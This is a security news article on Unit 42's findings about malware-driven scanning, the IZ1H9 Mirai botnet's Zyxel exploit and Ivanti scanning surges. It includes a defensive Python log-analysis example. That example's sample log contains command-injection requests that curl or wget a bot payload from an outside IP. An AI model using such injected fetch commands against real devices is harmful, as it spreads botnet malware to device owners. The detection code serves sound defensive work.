Researchers warn of a surge in malware-driven scanning attacks

Security researchers at Palo Alto Networks' Unit 42 said they are observing a significant rise in malware-driven scanning attacks, involving the hijacking of infected hosts to conduct scans on targets.

Instead of relying on direct scans, attackers are now leveraging malware-infected hosts to initiate scanning requests, significantly complicating detection and mitigation efforts.

The research identified several key characteristics of this scanning behavior, including the use of infected hosts to generate an unusually high volume of scanning requests. Attackers have also been observed embedding previously unseen URLs for payload delivery or command-and-control (C2) functions within exploit requests, reducing the likelihood of security vendors blocking subsequent malicious payloads or C2 URLs.

Once a device is compromised by malware, it establishes communication with attacker-controlled C2 domains for instructions. Threat actors can then commandeer the infected device's resources to execute scanning attacks on various target domains. These targets can vary based on the attacker's objectives, with specific entities, such as governments, often being prime targets for exploit attempts.
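The two characteristics described above, many distinct destinations probed from one infected source and previously unseen payload or C2 URLs embedded in the requests, can be checked for in web-server or proxy logs. The following is an added example written for this article, not Unit 42's tooling; the log format, the `min_unique_dst` threshold and the sample lines are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample request log (not taken from the article or Unit 42's data).
# Format per line: timestamp source_ip destination_host request_path
SAMPLE_LOG = """\
2024-01-14T10:00:01Z 203.0.113.10 host-a.example /cgi-bin/setup.cgi?cmd=curl%20http://198.51.100.7/bot.sh
2024-01-14T10:00:02Z 203.0.113.10 host-b.example /cgi-bin/setup.cgi?cmd=curl%20http://198.51.100.7/bot.sh
2024-01-14T10:00:03Z 203.0.113.10 host-c.example /cgi-bin/setup.cgi?cmd=wget%20http://198.51.100.7/bot.sh
2024-01-14T10:00:04Z 203.0.113.10 host-d.example /cgi-bin/setup.cgi?cmd=wget%20http://203.0.113.99/c2
2024-01-14T10:00:05Z 198.51.100.22 host-a.example /index.html
2024-01-14T10:00:06Z 198.51.100.22 host-a.example /static/app.js
2024-01-14T10:00:07Z 198.51.100.22 host-a.example /login?next=http://host-a.example/home
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def parse_log(text):
    """Split each non-empty line into (timestamp, source, destination, path)."""
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, path = line.split(maxsplit=3)
            records.append((ts, src, dst, path))
    return records

def scanning_sources(records, min_unique_dst=3):
    """Sources that touch many distinct destinations: the fan-out of a hijacked scanner."""
    dsts = defaultdict(set)
    for _, src, dst, _ in records:
        dsts[src].add(dst)
    return {src: len(d) for src, d in dsts.items() if len(d) >= min_unique_dst}

def embedded_urls(records, known_urls):
    """URLs carried inside request paths (percent-decoded), per source, minus already-known ones."""
    found = defaultdict(set)
    for _, src, _, path in records:
        for url in URL_RE.findall(unquote(path)):
            if url not in known_urls:
                found[src].add(url)
    return found

def flag_hosts(records, known_urls, min_unique_dst=3):
    """Scanning sources together with the unseen URLs they are pushing; candidates for blocking."""
    scanners = scanning_sources(records, min_unique_dst)
    urls = embedded_urls(records, known_urls)
    return {src: sorted(urls.get(src, ())) for src in scanners}

if __name__ == "__main__":
    print(flag_hosts(parse_log(SAMPLE_LOG), {"http://host-a.example/home"}))
```

The URLs reported for a flagged source are the ones worth adding to a blocklist before the next wave reuses them; a host that embeds a URL but does not fan out (the second source above) is left alone.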

One of the cases highlighted in the research involves the Mirai-based IZ1H9 botnet, which continues to evolve its toolkit for propagation. Unit 42's telemetry revealed attempted exploits targeting a Zyxel remote code execution vulnerability previously reported in 2023. The exploit abuses an insufficient input validation flaw in the /bin/zhttpd/ component of certain Zyxel router versions to download a malicious file, which then starts the replication of the Mirai botnet.

One incident occurred on June 19, 2023, when Unit 42 observed an unprecedented surge in the number of unique destinations scanned. Over 2,247 devices were involved in a distributed exploit attempt targeting 15,812 internet service providers (ISPs).

The researchers have also noted a surge in vulnerability scanning for a series of Ivanti flaws (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) starting on January 14, 2024.

“On this day, 25,268 unique hosts were scanned by at least 15,645 infected hosts. Only four days after the initial spike, on Jan. 18, 2024, these numbers jumped. We then observed 82,441 unique hosts being scanned by at least 39,658 infected hosts,” the team said.
